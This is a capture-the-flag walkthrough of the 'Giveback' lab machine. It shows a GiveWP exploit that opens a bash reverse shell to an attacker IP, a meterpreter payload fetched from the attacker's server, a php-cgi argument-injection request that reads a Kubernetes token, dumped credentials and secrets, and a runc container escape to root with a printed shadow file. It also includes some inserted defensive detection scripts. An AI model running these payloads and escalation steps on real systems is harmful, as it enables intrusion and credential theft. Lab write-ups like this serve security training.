[Season9] Giveback WP

User Flag

nmap finds three open ports: 22 (SSH), 80 (a WordPress site behind nginx) and 30686, which looks like something Kubernetes-related; its JSON banner names the service `wp-nginx-service` in namespace `default`.

PORT      STATE SERVICE REASON         VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 8.9p1 Ubuntu 3ubuntu0.13 (Ubuntu Linux; protocol 2.0)
80/tcp open http syn-ack ttl 62 nginx 1.28.0
|_http-favicon: Unknown favicon MD5: 000BF649CC8F6BF27CFB04D1BCDCD3C7
|_http-generator: WordPress 6.8.1
| http-methods:
|_ Supported Methods: GET HEAD POST
| http-robots.txt: 1 disallowed entry
|_/wp-admin/
|_http-server-header: nginx/1.28.0
|_http-title: GIVING BACK IS WHAT MATTERS MOST – OBVI
30686/tcp open unknown syn-ack ttl 63
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.0 200 OK
| Content-Type: application/json
| X-Content-Type-Options: nosniff
| X-Load-Balancing-Endpoint-Weight: 1
| Date: Mon, 03 Nov 2025 15:28:06 GMT
| Content-Length: 127
| "service": {
| "namespace": "default",
| "name": "wp-nginx-service"
| "localEndpoints": 1,
| "serviceProxyHealthy": true
| GenericLines, Help, Kerberos, RTSPRequest, SSLSessionReq, TLSSessionReq, TerminalServerCookie:
| HTTP/1.1 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| Connection: close
| Request
| GetRequest, HTTPOptions:
| HTTP/1.0 200 OK
| Content-Type: application/json
| X-Content-Type-Options: nosniff
| X-Load-Balancing-Endpoint-Weight: 1
| Date: Mon, 03 Nov 2025 15:27:36 GMT
| Content-Length: 127
| "service": {
| "namespace": "default",
| "name": "wp-nginx-service"
| "localEndpoints": 1,
|_ "serviceProxyHealthy": true

wpscan finds the give plugin installed at version 3.14.0:

[+] give
| Location: http://localhost/wp-content/plugins/give/
| Last Updated: 2025-10-29T20:17:00.000Z
| [!] The version is out of date, the latest version is 4.12.0
|
| Found By: Urls In Homepage (Passive Detection)
| Confirmed By:
| Urls In 404 Page (Passive Detection)
| Meta Tag (Passive Detection)
| Javascript Var (Passive Detection)
|
| Version: 3.14.0 (100% confidence)
| Found By: Query Parameter (Passive Detection)
| - http://localhost/wp-content/plugins/give/assets/dist/css/give.css?ver=3.14.0
| Confirmed By:
| Meta Tag (Passive Detection)
| - http://localhost/, Match: 'Give v3.14.0'
| Javascript Var (Passive Detection)
| - http://localhost/, Match: '"1","give_version":"3.14.0","magnific_options"'

A search shows this version is affected by CVE-2024-5932.

Using EQSTLab/CVE-2024-8353 (GiveWP PHP Object Injection exploit):

uv run CVE-2024-8353.py -u http://10.129.127.118/donations/the-things-we-need/ -c 'bash -c "/bin/bash -i >& /dev/tcp/10.10.16.25/443 0>&1"'

wp-config.php from the pod:

<?php
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the installation.
* You don't have to use the website, you can copy this file to "wp-config.php"
* and fill in the values.
*
* This file contains the following configurations:
*
* * Database settings
* * Secret keys
* * Database table prefix
* * ABSPATH
*
* @link https://developer.wordpress.org/advanced-administration/wordpress/wp-config/
*
* @package WordPress
*/

// ** Database settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'bitnami_wordpress' );

/** Database username */
define( 'DB_USER', 'bn_wordpress' );

/** Database password */
define( 'DB_PASSWORD', 'sW5sp4spa3u7RLyetrekE4oS' );

/** Database hostname */
define( 'DB_HOST', 'beta-vino-wp-mariadb:3306' );

/** Database charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );

/** The database collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );

/**#@+
* Authentication unique keys and salts.
*
* Change these to different unique phrases! You can generate these using
* the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}.
*
* You can change these at any point in time to invalidate all existing cookies.
* This will force all users to have to log in again.
*
* @since 2.6.0
*/
define( 'AUTH_KEY', 'G7T{pv:!LZWUfekgP{A8TGFoL0,dMEU,&2B)ALoZS[8lo8V~+UGj@kWW%n^.vZgx' );
define( 'SECURE_AUTH_KEY', 'F3!hvuWAWvZw^$^|L]ONjyS{*xPHr(j,2$)!@t.(ZEn9NPNQ!A*6o6l}8@IN)>?>' );
define( 'LOGGED_IN_KEY', 'E5x5$T@Ggpti3+!/0G<>j<ylElF+}#Ny-7XZLw<#j[6|:oel9%OgxG|U}86./&&K' );
define( 'NONCE_KEY', 'jM^E^Bx{vf-Ca~2$eXbH%RzD?=VmxWP9Z}-}J1E@N]t`GOP`8;<F;lYmGz8sh7sG' );
define( 'AUTH_SALT', '+L>`[0~bk-bRDX 5F?ER)PUnB_ ZWSId=J {5XV:trSTp0u!~6shvPS`VP{f(@_Q' );
define( 'SECURE_AUTH_SALT', 'RdhA5mNy%0~H%~s~S]a,G~;=n|)+~hZ/JWy*$GP%sAB-f>.;rcsO6.HXPvw@2q,]' );
define( 'LOGGED_IN_SALT', 'i?aJHLYu/rI%@MWZTw%Ch~%h|M/^Wum4$#4;qm(#zgQA+X3gKU?~B)@Mbgy %k}G' );
define( 'NONCE_SALT', 'Y!dylf@|OTpnNI+fC~yFTq@<}$rN)^>=+e}Q~*ez?1dnb8kF8@_{QFy^n;)gk&#q' );

/**#@-*/

/**
* WordPress database table prefix.
*
* You can have multiple installations in one database if you give each
* a unique prefix. Only numbers, letters, and underscores please!
*/
$table_prefix = 'wp_';

/**
* For developers: WordPress debugging mode.
*
* Change this to true to enable the display of notices during development.
* It is strongly recommended that plugin and theme developers use WP_DEBUG
* in their development environments.
*
* For information on other constants that can be used for debugging,
* visit the documentation.
*
* @link https://developer.wordpress.org/advanced-administration/debug/debug-wordpress/
*/
define( 'WP_DEBUG', false );

/* Add any custom values between this line and the "stop editing" line. */



define( 'FS_METHOD', 'direct' );
/**
* The WP_SITEURL and WP_HOME options are configured to access from any hostname or IP address.
* If you want to access only from an specific domain, you can modify them. For example:
* define('WP_HOME','http://example.com');
* define('WP_SITEURL','http://example.com');
*
*/
if ( defined( 'WP_CLI' ) ) {
$_SERVER['HTTP_HOST'] = '127.0.0.1';
}

define( 'WP_HOME', 'http://' . $_SERVER['HTTP_HOST'] . '/' );
define( 'WP_SITEURL', 'http://' . $_SERVER['HTTP_HOST'] . '/' );
define( 'WP_AUTO_UPDATE_CORE', false );
/* That's all, stop editing! Happy publishing. */

/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
define( 'ABSPATH', __DIR__ . '/' );
}

/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';

/**
* Disable pingback.ping xmlrpc method to prevent WordPress from participating in DDoS attacks
* More info at: https://docs.bitnami.com/general/apps/wordpress/troubleshooting/xmlrpc-and-pingback/ */
if ( !defined( 'WP_CLI' ) ) {
// remove x-pingback HTTP header
add_filter("wp_headers", function($headers) {
unset($headers["X-Pingback"]);
return $headers;
});
// disable pingbacks
add_filter( "xmlrpc_methods", function( $methods ) {
unset( $methods["pingback.ping"] );
return $methods;
});
}

Dump the user credentials from the database:

mysql -u bn_wordpress -p'sW5sp4spa3u7RLyetrekE4oS' -h beta-vino-wp-mariadb -D bitnami_wordpress -e "SELECT user_login, user_pass FROM wp_users;"

Result:

user_login      user_pass
user $P$Bm1D6gJHKylnyyTeT0oYNGKpib//vP.

From the pod's environment variables:

LEGACY_INTRANET_SERVICE_PORT=tcp://10.43.2.241:5000

Set up a pivot with Msf:

msfvenom -p linux/x64/meterpreter_reverse_tcp  LHOST=10.10.16.102 LPORT=4444 -f elf -o met

Upload it, then add a port forward in meterpreter:

php -r "copy('http://10.10.16.102:8000/met', 'met');"
meterpreter > portfwd add -l 5000 -p 5000 -r 10.43.2.241

Visiting 10.43.2.241:5000 shows:

/cgi-bin/php-cgi — PHP-CGI Handler


### Developer Note

This CMS was originally deployed on Windows IIS using `php-cgi.exe`. During migration to Linux, the Windows-style CGI handling was retained to ensure legacy scripts continued to function without modification.

The PHP version is 8.3.3 (X-Powered-By: PHP/8.3.3) and the note says it was migrated from Windows, so it is likely affected by CVE-2024-4577.

This box probably has no outbound network access, so I enumerated directly through the webshell and found it runs as root.

Payload:

POST /cgi-bin/php-cgi?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1
Host: 0.0.0.0:5000
Content-Length: 3
Pragma: no-cache
Cache-Control: no-cache
Origin: http://0.0.0.0:5000
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate, br
Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
Connection: keep-alive

cat${IFS}/var/run/secrets/kubernetes.io/serviceaccount/token
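As an added example that is not part of the writeup, here is detection logic for the php-cgi argument-injection pattern used above (CVE-2024-4577), run over a few constructed nginx-style access log lines; the log format and the directive list are my assumptions.

```python
"""Added example, not from the original writeup: detection logic for the
php-cgi argument-injection pattern used above (CVE-2024-4577), run over a
few constructed access-log lines. The log format (nginx combined) and the
directive list are my assumptions."""
import re
from urllib.parse import unquote

# Constructed sample log lines; line 2 mirrors the request shown in the writeup.
SAMPLE_LOG = """\
10.0.0.5 - - [06/Nov/2025:10:02:13 +0000] "GET /index.php?page=home HTTP/1.1" 200 512
10.0.0.9 - - [06/Nov/2025:10:02:19 +0000] "POST /cgi-bin/php-cgi?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 200 88
10.0.0.9 - - [06/Nov/2025:10:02:23 +0000] "GET /cgi-bin/php-cgi?%2Dd+allow_url_include%3d1 HTTP/1.1" 200 88
10.0.0.7 - - [06/Nov/2025:10:03:01 +0000] "GET /donate/?amount=%AD5 HTTP/1.1" 200 4096
10.0.0.8 - - [06/Nov/2025:10:03:05 +0000] "GET /cgi-bin/php-cgi HTTP/1.1" 200 88
"""

# Request line: method, path, optional query string.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>[^\s?]+)(?:\?(?P<query>\S*))? HTTP/')

# php.ini directives that should never be settable from a request.
SENSITIVE_DIRECTIVES = (
    "allow_url_include", "auto_prepend_file",
    "cgi.force_redirect", "cgi.redirect_status_env", "disable_functions",
)

def classify_request(path: str, query: str) -> list[str]:
    """Reasons this request looks like php-cgi option injection (empty if none)."""
    reasons = []
    if "php-cgi" not in path.lower():
        return reasons  # a soft hyphen elsewhere (a form field, say) is not this bug
    if re.search(r"%AD", query, re.IGNORECASE):
        reasons.append("soft hyphen (%AD) in php-cgi query string")
    # latin-1 keeps 0xAD as U+00AD instead of replacing it with U+FFFD.
    decoded = unquote(query.replace("+", " "), encoding="latin-1")
    # Option marker: '-d' or soft-hyphen + 'd' followed by a directive name.
    if re.search(r"(?:^|\s)[-\u00ad]d\s*\S", decoded):
        reasons.append("php-cgi -d option marker in query")
    reasons.extend(f"sets {d}" for d in SENSITIVE_DIRECTIVES if d in decoded)
    return reasons

def scan_log(text: str) -> list[tuple[str, list[str]]]:
    """Return (log line, reasons) for every line that trips the detector."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        reasons = classify_request(m["path"], m["query"] or "")
        if reasons:
            hits.append((line, reasons))
    return hits

if __name__ == "__main__":
    for line, reasons in scan_log(SAMPLE_LOG):
        print(line.split('"')[1], "->", "; ".join(reasons))
```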

This returns the pod's k8s service account token (it appears in full in the kubectl commands below).


Enumerate with kubectl:

KUBERNETES_SERVICE_PORT=443
KUBERNETES_SERVICE_HOST=10.43.0.1

meterpreter > portfwd add -l 5443 -p 443 -r 10.43.0.1

export K8S_APISERVER="https://0.0.0.0:5443"
export SA_TOKEN="eyJhbGciOiJSUzI1NiIsImtpZCI6Inp3THEyYUhkb19sV3VBcGFfdTBQa1c1S041TkNiRXpYRS11S0JqMlJYWjAifQ.eyJhdWQiOlsiaHR0cHM6Ly9rdWJlcm5ldGVzLmRlZmF1bHQuc3ZjLmNsdXN0ZXIubG9jYWwiLCJrM3MiXSwiZXhwIjoxNzkzOTc5ODA4LCJpYXQiOjE3NjI0NDM4MDgsImlzcyI6Imh0dHBzOi8va3ViZXJuZXRlcy5kZWZhdWx0LnN2Yy5jbHVzdGVyLmxvY2FsIiwianRpIjoiYWYzOTRlZGMtZjA1Mi00Yzc1LTgzYTUtNmFkMDFhNDBlOTkxIiwia3ViZXJuZXRlcy5pbyI6eyJuYW1lc3BhY2UiOiJkZWZhdWx0Iiwibm9kZSI6eyJuYW1lIjoiZ2l2ZWJhY2suaHRiIiwidWlkIjoiMTJhOGE5Y2YtYzM1Yi00MWYzLWIzNWEtNDJjMjYyZTQzMDQ2In0sInBvZCI6eyJuYW1lIjoibGVnYWN5LWludHJhbmV0LWNtcy02ZjdiZjVkYjg0LWxmdzdsIiwidWlkIjoiMzM3ODUxY2QtYTM2NS00NmU2LTk4MDAtZTJhYzdlMWUyZmIyIn0sInNlcnZpY2VhY2NvdW50Ijp7Im5hbWUiOiJzZWNyZXQtcmVhZGVyLXNhIiwidWlkIjoiNzJjM2YwYTUtOWIwOC00MzhhLWEzMDctYjYwODc0NjM1YTlhIn0sIndhcm5hZnRlciI6MTc2MjQ0NzQxNX0sIm5iZiI6MTc2MjQ0MzgwOCwic3ViIjoic3lzdGVtOnNlcnZpY2VhY2NvdW50OmRlZmF1bHQ6c2VjcmV0LXJlYWRlci1zYSJ9.1wI6pBKmcZGUVsMQlRya988Y5yj0H_elwIy-bow3bAldYdYURUZo3dCrfXY9KQ7qy1f2d6jmqMF6VgERaI6csKcUmg7c_Uho5anrRZ6cWYzZ9IV0oJ9aywiscpGMk-F8NeGI3Zqz5H8_QeZGVb8pAou4SOfHyIP479Mj4aOymbUHTfhdFxs93J2Bl7B4eVVS6RF8jYTvIYPsXhfqtxAsZpxpziNG3_KsTEV19CO1O0wQ9vQUmUyCbSHj24Q_KmTHKMgZHImtp7OPbj1AynILr8wlKpyouANtC_EWyf6w9rsi-5Qs30ZJYruNr7pa07FvmYoR-awHxuJBpsSVVSNN8w"

./kubectl --server="$K8S_APISERVER" --token="$SA_TOKEN" --insecure-skip-tls-verify=true auth can-i --list

Resources Non-Resource URLs Resource Names Verbs
selfsubjectreviews.authentication.k8s.io [] [] [create]
selfsubjectaccessreviews.authorization.k8s.io [] [] [create]
selfsubjectrulesreviews.authorization.k8s.io [] [] [create]
secrets [] [] [get list]
[/.well-known/openid-configuration/] [] [get]
[/.well-known/openid-configuration] [] [get]
[/api/*] [] [get]
[/api] [] [get]
[/apis/*] [] [get]
[/apis] [] [get]
[/healthz] [] [get]
[/healthz] [] [get]
[/livez] [] [get]
[/livez] [] [get]
[/openapi/*] [] [get]
[/openapi] [] [get]
[/openid/v1/jwks/] [] [get]
[/openid/v1/jwks] [] [get]
[/readyz] [] [get]
[/readyz] [] [get]
[/version/] [] [get]
[/version/] [] [get]
[/version] [] [get]
[/version] [] [get]

The account has [get list] permissions on secrets:
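As an added example (not part of the writeup), a least-privilege check over `kubectl auth can-i --list` output: it parses the table layout shown above and flags a service account that can read every Secret in its namespace. The sample table is a constructed excerpt and the SENSITIVE table is my own assumption.

```python
"""Added example, not from the writeup: a least-privilege check over the
output of `kubectl auth can-i --list`. It parses the table layout shown
above and flags a service account, like the one above, that can read every
Secret in its namespace. The sample table is a constructed excerpt; the
SENSITIVE table is my own assumption."""
import re

SAMPLE_CAN_I = """\
Resources                                       Non-Resource URLs   Resource Names   Verbs
selfsubjectreviews.authentication.k8s.io        []                  []               [create]
selfsubjectaccessreviews.authorization.k8s.io   []                  []               [create]
secrets                                         []                  []               [get list]
                                                [/api/*]            []               [get]
                                                [/healthz]          []               [get]
"""

# Resource/verb combinations a workload service account rarely needs.
SENSITIVE = {
    "secrets": {"get", "list", "watch"},
    "pods/exec": {"create"},
    "pods": {"create", "patch", "update"},
    "serviceaccounts/token": {"create"},
}

BRACKETS = re.compile(r"\[([^\]]*)\]")

def parse_can_i(text: str) -> list[dict]:
    """Turn the table into rows of {resource, urls, names, verbs}."""
    rows = []
    for line in text.splitlines():
        cells = BRACKETS.findall(line)
        if len(cells) != 3:
            continue                      # header or blank line
        resource = line[: line.find("[")].strip()   # empty for non-resource rows
        urls, names, verbs = (c.split() for c in cells)
        rows.append({"resource": resource, "urls": urls,
                     "names": names, "verbs": set(verbs)})
    return rows

def audit(rows: list[dict]) -> list[str]:
    """Return findings for resource rules; non-resource URLs are informational."""
    findings = []
    for r in rows:
        if not r["resource"]:
            continue
        if r["resource"] == "*" or "*" in r["verbs"]:
            findings.append(f"wildcard access: {r['resource']} {sorted(r['verbs'])}")
            continue
        hit = SENSITIVE.get(r["resource"], set()) & r["verbs"]
        if hit:
            scope = f"names {r['names']}" if r["names"] else "all names"
            findings.append(f"{r['resource']}: {sorted(hit)} on {scope}")
    return findings

if __name__ == "__main__":
    for f in audit(parse_can_i(SAMPLE_CAN_I)):
        print("-", f)
```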

./kubectl --server="$K8S_APISERVER" --token="$SA_TOKEN" --insecure-skip-tls-verify=true get secrets -n default
NAME TYPE DATA AGE
beta-vino-wp-mariadb Opaque 2 410d
beta-vino-wp-wordpress Opaque 1 410d
sh.helm.release.v1.beta-vino-wp.v58 helm.sh/release.v1 1 68d
sh.helm.release.v1.beta-vino-wp.v59 helm.sh/release.v1 1 68d
sh.helm.release.v1.beta-vino-wp.v60 helm.sh/release.v1 1 67d
sh.helm.release.v1.beta-vino-wp.v61 helm.sh/release.v1 1 67d
sh.helm.release.v1.beta-vino-wp.v62 helm.sh/release.v1 1 67d
sh.helm.release.v1.beta-vino-wp.v63 helm.sh/release.v1 1 67d
sh.helm.release.v1.beta-vino-wp.v64 helm.sh/release.v1 1 67d
sh.helm.release.v1.beta-vino-wp.v65 helm.sh/release.v1 1 67d
sh.helm.release.v1.beta-vino-wp.v66 helm.sh/release.v1 1 42d
sh.helm.release.v1.beta-vino-wp.v67 helm.sh/release.v1 1 42d
user-secret-babywyrm Opaque 1 6h49m
user-secret-margotrobbie Opaque 1 6h49m
user-secret-sydneysweeney Opaque 1 6h49m


./kubectl --server="$K8S_APISERVER" --token="$SA_TOKEN" --insecure-skip-tls-verify=true get secret beta-vino-wp-mariadb beta-vino-wp-wordpress user-secret-babywyrm user-secret-margotrobbie user-secret-sydneysweeney -n default -o json
{
"apiVersion": "v1",
"items": [
{
"apiVersion": "v1",
"data": {
"mariadb-password": "c1c1c3A0c3BhM3U3Ukx5ZXRyZWtFNG9T",
"mariadb-root-password": "c1c1c3A0c3lldHJlMzI4MjgzODNrRTRvUw=="
},
"kind": "Secret",
"metadata": {
"annotations": {
"meta.helm.sh/release-name": "beta-vino-wp",
"meta.helm.sh/release-namespace": "default"
},
"creationTimestamp": "2024-09-21T22:17:31Z",
"labels": {
"app.kubernetes.io/instance": "beta-vino-wp",
"app.kubernetes.io/managed-by": "Helm",
"app.kubernetes.io/name": "mariadb",
"app.kubernetes.io/part-of": "mariadb",
"app.kubernetes.io/version": "11.8.2",
"helm.sh/chart": "mariadb-21.0.0"
},
"name": "beta-vino-wp-mariadb",
"namespace": "default",
"resourceVersion": "2088227",
"uid": "3473d5ec-b774-40c9-a249-81d51426a45e"
},
"type": "Opaque"
},
{
"apiVersion": "v1",
"data": {
"wordpress-password": "TzhGN0tSNXpHaQ=="
},
"kind": "Secret",
"metadata": {
"annotations": {
"meta.helm.sh/release-name": "beta-vino-wp",
"meta.helm.sh/release-namespace": "default"
},
"creationTimestamp": "2024-09-21T22:17:31Z",
"labels": {
"app.kubernetes.io/instance": "beta-vino-wp",
"app.kubernetes.io/managed-by": "Helm",
"app.kubernetes.io/name": "wordpress",
"app.kubernetes.io/version": "6.8.2",
"helm.sh/chart": "wordpress-25.0.5"
},
"name": "beta-vino-wp-wordpress",
"namespace": "default",
"resourceVersion": "2088228",
"uid": "1cbbc5ac-1611-46af-8033-09e98dfc546b"
},
"type": "Opaque"
},
{
"apiVersion": "v1",
"data": {
"MASTERPASS": "ZmU0TlEwdFNyOUVWNDlaSG9sYzdGa1ZRQ1gxVDZw"
},
"kind": "Secret",
"metadata": {
"creationTimestamp": "2025-11-06T10:02:13Z",
"name": "user-secret-babywyrm",
"namespace": "default",
"ownerReferences": [
{
"apiVersion": "bitnami.com/v1alpha1",
"controller": true,
"kind": "SealedSecret",
"name": "user-secret-babywyrm",
"uid": "7a955a65-f599-4bdd-9b0e-0a9d77d76fa3"
}
],
"resourceVersion": "2855769",
"uid": "138833db-17d3-4687-85cd-e08c86f071a0"
},
"type": "Opaque"
},
{
"apiVersion": "v1",
"data": {
"USER_PASSWORD": "d2NRZXpFcVZpdlUwNWV3akZPRU4zUEVKV1drbGMzUQ=="
},
"kind": "Secret",
"metadata": {
"creationTimestamp": "2025-11-06T10:02:23Z",
"name": "user-secret-margotrobbie",
"namespace": "default",
"ownerReferences": [
{
"apiVersion": "bitnami.com/v1alpha1",
"controller": true,
"kind": "SealedSecret",
"name": "user-secret-margotrobbie",
"uid": "0565b4c6-fdfd-4e35-8044-b3cd402e8d53"
}
],
"resourceVersion": "2855829",
"uid": "227f71e6-93d8-493d-989c-5a6885c290a0"
},
"type": "Opaque"
},
{
"apiVersion": "v1",
"data": {
"USER_PASSWORD": "c3U0WExLSnV6Mkh0QnBNTk1rajFlTUF1aVFvYXR5WHU="
},
"kind": "Secret",
"metadata": {
"creationTimestamp": "2025-11-06T10:02:19Z",
"name": "user-secret-sydneysweeney",
"namespace": "default",
"ownerReferences": [
{
"apiVersion": "bitnami.com/v1alpha1",
"controller": true,
"kind": "SealedSecret",
"name": "user-secret-sydneysweeney",
"uid": "4110f80b-e845-4574-b1f7-f9039c7333ca"
}
],
"resourceVersion": "2855816",
"uid": "ee7f04fe-39e7-4fa9-bf0c-4381efb49119"
},
"type": "Opaque"
}
],
"kind": "List",
"metadata": {
"resourceVersion": ""
}
}

Log in over SSH with the decoded MASTERPASS value, babywyrm:fe4NQ0tSr9EV49ZHolc7FkVQCX1T6p.

user.txt is in /home/babywyrm/.

Root Flag

babywyrm@giveback:~$ sudo -l
Matching Defaults entries for babywyrm on localhost:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
use_pty, timestamp_timeout=0, timestamp_timeout=20

User babywyrm may run the following commands on localhost:
(ALL) NOPASSWD: !ALL
(ALL) /opt/debug

Use the mariadb-password value still in its base64 form, c1c1c3A0c3BhM3U3Ukx5ZXRyZWtFNG9T, as the administrative password:

babywyrm@giveback:~$ sudo /opt/debug --help
Validating sudo...
Please enter the administrative password:

Both passwords verified. Executing the command...
NAME:
runc - Open Container Initiative runtime

runc is a command line client for running applications packaged according to
the Open Container Initiative (OCI) format and is a compliant implementation of the
Open Container Initiative specification.

runc integrates well with existing process supervisors to provide a production
container runtime environment for applications. It can be used with your
existing process monitoring tools and the container will be spawned as a
direct child of the process supervisor.

Containers are configured using bundles. A bundle for a container is a directory
that includes a specification file named "config.json" and a root filesystem.
The root filesystem contains the contents of the container.

To start a new instance of a container:

# runc run [ -b bundle ] <container-id>

Where "<container-id>" is your name for the instance of the container that you
are starting. The name you provide for the container instance must be unique on
your host. Providing the bundle directory using "-b" is optional. The default
value for "bundle" is the current directory.

USAGE:
runc.amd64.debug [global options] command [command options] [arguments...]

VERSION:
1.1.11
commit: v1.1.11-0-g4bccb38c
spec: 1.0.2-dev
go: go1.20.12
libseccomp: 2.5.4

COMMANDS:
checkpoint checkpoint a running container
create create a container
delete delete any resources held by the container often used with detached container
events display container events such as OOM notifications, cpu, memory, and IO usage statistics
exec execute new process inside the container
kill kill sends the specified signal (default: SIGTERM) to the container's init process
list lists containers started by runc with the given root
pause pause suspends all processes inside the container
ps ps displays the processes running inside a container
restore restore a container from a previous checkpoint
resume resumes all processes that have been previously paused
run create and run a container
spec create a new specification file
start executes the user defined process in a created container
state output the state of a container
update update container resource constraints
features show the enabled features
help, h Shows a list of commands or help for one command

GLOBAL OPTIONS:
--debug enable debug logging
--log value set the log file to write runc logs to (default is '/dev/stderr')
--log-format value set the log format ('text' (default), or 'json') (default: "text")
--root value root directory for storage of container state (this should be located in tmpfs) (default: "/run/runc")
--criu value path to the criu binary used for checkpoint and restore (default: "criu")
--systemd-cgroup enable systemd cgroup support, expects cgroupsPath to be of form "slice:prefix:name" for e.g. "system.slice:runc:434234"
--rootless value ignore cgroup permission errors ('true', 'false', or 'auto') (default: "auto") --help, -h show help
--version, -v print the version

This is runc, a container runtime, so the plan is to bind-mount the host filesystem into a container.

Create config.json:

{
"ociVersion": "1.0.2",
"process": {
"user": {"uid": 0, "gid": 0},
"args": ["/bin/bash"],
"cwd": "/",
"env": ["PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"],
"terminal": false
},
"root": {"path": "rootfs"},
"mounts": [
{"destination": "/proc", "type": "proc", "source": "proc"},
{"destination": "/bin", "type": "bind", "source": "/bin", "options": ["bind","ro"]},
{"destination": "/lib", "type": "bind", "source": "/lib", "options": ["bind","ro"]},
{"destination": "/lib64", "type": "bind", "source": "/lib64", "options": ["bind","ro"]},
{"destination": "/root", "type": "bind", "source": "/root", "options": ["bind","ro"]},
{"destination": "/etc", "type": "bind", "source": "/etc", "options": ["bind","ro"]}
],
"linux": {"namespaces": [{"type": "mount"}]}
}
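As an added example that is not from the writeup, an audit of an OCI bundle config.json like the one above: it lists the settings that turn a `runc run` into a host escape (a uid 0 process, host-path bind mounts, missing namespaces). The sample config is a constructed, trimmed copy of the one above; the sensitive-path list and wording are my assumptions.

```python
"""Added example, not from the writeup: audit an OCI bundle config.json
such as the one above and list the settings that make `runc run` an escape
to the host: a uid 0 process, host-path bind mounts, and missing
namespaces. The sample config is a constructed, trimmed copy of the one in
the writeup; the path list and wording are my assumptions."""
import json

SAMPLE_CONFIG = json.loads("""
{
  "ociVersion": "1.0.2",
  "process": {"user": {"uid": 0, "gid": 0}, "args": ["/bin/bash"], "cwd": "/"},
  "root": {"path": "rootfs"},
  "mounts": [
    {"destination": "/proc", "type": "proc", "source": "proc"},
    {"destination": "/bin",  "type": "bind", "source": "/bin",  "options": ["bind", "ro"]},
    {"destination": "/root", "type": "bind", "source": "/root", "options": ["bind", "ro"]},
    {"destination": "/etc",  "type": "bind", "source": "/etc",  "options": ["bind", "ro"]}
  ],
  "linux": {"namespaces": [{"type": "mount"}]}
}
""")

# Namespaces a non-privileged container is expected to have on top of mount.
EXPECTED_NAMESPACES = {"pid", "network", "ipc", "uts", "mount"}
# Host directories whose exposure (even read-only) leaks secrets or host state.
SENSITIVE_HOST_PATHS = ("/root", "/etc", "/home", "/run", "/var/run", "/proc", "/sys", "/dev")

def is_sensitive_host_path(src: str) -> bool:
    """True for the host root itself or anything under a sensitive directory."""
    if src == "/":
        return True
    return any(src == p or src.startswith(p + "/") for p in SENSITIVE_HOST_PATHS)

def audit_bundle(cfg: dict) -> list[str]:
    """Return human-readable findings for a parsed config.json."""
    findings = []
    proc = cfg.get("process", {})
    if proc.get("user", {}).get("uid", 0) == 0:       # OCI default uid is 0
        findings.append("process runs as uid 0 inside the container")
    if not proc.get("noNewPrivileges", False):
        findings.append("noNewPrivileges is not set")
    if not cfg.get("root", {}).get("readonly", False):
        findings.append("root filesystem is writable")
    for m in cfg.get("mounts", []):
        src, opts = m.get("source", ""), m.get("options", [])
        if m.get("type") == "bind" and is_sensitive_host_path(src):
            mode = "ro" if "ro" in opts else "rw"
            findings.append(f"host bind mount {src} -> {m.get('destination')} ({mode})")
    have = {ns.get("type") for ns in cfg.get("linux", {}).get("namespaces", [])}
    missing = sorted(EXPECTED_NAMESPACES - have)
    if missing:
        findings.append("shares host namespaces: " + ", ".join(missing))
    if "user" not in have:
        findings.append("no user namespace: container uid 0 is host uid 0")
    return findings

if __name__ == "__main__":
    for f in audit_bundle(SAMPLE_CONFIG):
        print("-", f)
```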

Run runc:

babywyrm@giveback:/tmp/runc$ sudo /opt/debug run aaa
Validating sudo...
Please enter the administrative password:

Both passwords verified. Executing the command...
id
uid=0(root) gid=0(root) groups=0(root)

Hash

root:$y$j9T$QFzc3gsorLqusBf73kX1x.$jyvD/pCPnr99xNLW62eqJVCQT5IbN7seZdPI3YoLgCA:20361:0:99999:7:::
daemon:*:19977:0:99999:7:::
bin:*:19977:0:99999:7:::
sys:*:19977:0:99999:7:::
sync:*:19977:0:99999:7:::
games:*:19977:0:99999:7:::
man:*:19977:0:99999:7:::
lp:*:19977:0:99999:7:::
mail:*:19977:0:99999:7:::
news:*:19977:0:99999:7:::
uucp:*:19977:0:99999:7:::
proxy:*:19977:0:99999:7:::
www-data:*:19977:0:99999:7:::
backup:*:19977:0:99999:7:::
list:*:19977:0:99999:7:::
irc:*:19977:0:99999:7:::
gnats:*:19977:0:99999:7:::
nobody:*:19977:0:99999:7:::
_apt:*:19977:0:99999:7:::
systemd-network:*:19977:0:99999:7:::
systemd-resolve:*:19977:0:99999:7:::
messagebus:*:19977:0:99999:7:::
systemd-timesync:*:19977:0:99999:7:::
pollinate:*:19977:0:99999:7:::
usbmux:*:19987:0:99999:7:::
sshd:*:19987:0:99999:7:::
babywyrm:$y$j9T$iXuCIsxdKlm04iCANMsoy1$ocXHJTxMHMc5nh3rKCUuk4D3q/OVBs/HV/yJ0pqKR86:20400:0:99999:7:::
_laurel:!:20363::::::